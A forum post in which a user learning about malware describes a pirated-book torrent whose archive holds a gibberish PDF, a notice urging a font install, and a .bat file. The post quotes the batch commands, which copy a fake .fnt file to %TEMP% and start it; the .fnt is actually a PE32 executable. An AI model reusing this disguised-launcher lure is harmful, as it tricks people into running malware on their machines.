Razz Posted December 13, 2016 Share Posted December 13, 2016 Hi guys, I'm learning about malware and I remember stumbling upon this cool forum some time ago. I recently downloaded a pdf of a book, because I wanted to look up some pages in the book since it was used as a source in an article I was reading. It's a pretty obscure book and since I couldn't find a legitimate source for it, I thought what the hell why not try one of the risky fake-looking torrent links. To my surprise the torrent downloaded immediately and I got a .rar file. Normally with these things the rar file is either encrypted with a password or the pdf itself is fake and only contains instructions on how to complete a CPA offer to get access to the most of the time non-existing pdf file. But to my surprise the rar file contained this: add.AcrobatPDFsomefont.bat ADOBE_somefont.fnt title.pdf IMPORTANT.NOTICE.txt I changed the font name to make it harder for the malware maker to stumble upon this topic using google, I'm pretty sure that wasn't needed. Content of IMPORTANT.NOTICE.txt: "IMPORTANT NOTICE: Install the necessary fonts using add.AcrobatPDFsomefont.bat file." The pdf file is 300+ pages long and is filled with gibberish. At the top it says in red letters a similar warning:ADOBE PDF Warning: required fonts is not installed. (ADOBE_somefont.fnt) Pretty cool, apparently they want me to click on the .bat file, this is probably malware. the .bat file has two commands: copy ADOBE_somefont.fnt %TEMP% acrobat /convert fonts:UTF-8 /font:load & start %TEMP%\ADOBE_somefont.fnt Since it was late and my curiosity got the better of me after viewing the .bat file, I decided to run it (I know). The bat file started a commandline screen with hardcoded text telling me the supposed font had been loaded. Now I'm really interested in how this works. Analyzing the .fnt file tells me it is a PE32 executable. Looking around with PE explorer I can see the contents of the malware , but I'm not skilled enough to actually understand what it is trying to do. My question is, how does malware like this work? How can that "acrobat" command execute a .fnt file and why didn't my antivirus pick up on this? Using virustotal 4-5 out of 50 virusscanners say it uses some kind of malign heuristics to do it's work, but maybe that's just because it was packed. I'm not sure if I have earned the privilege yet to upload files, and even so I'm pretty sure uploading files will raise suspicion since I have just registered as a new user. But I can upload the rar file if anyone is interested to take a look at it. Thanks in advance! Link to comment Share on other sites More sharing options...
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!Register a new account
Already have an account? Sign in here.Sign In Now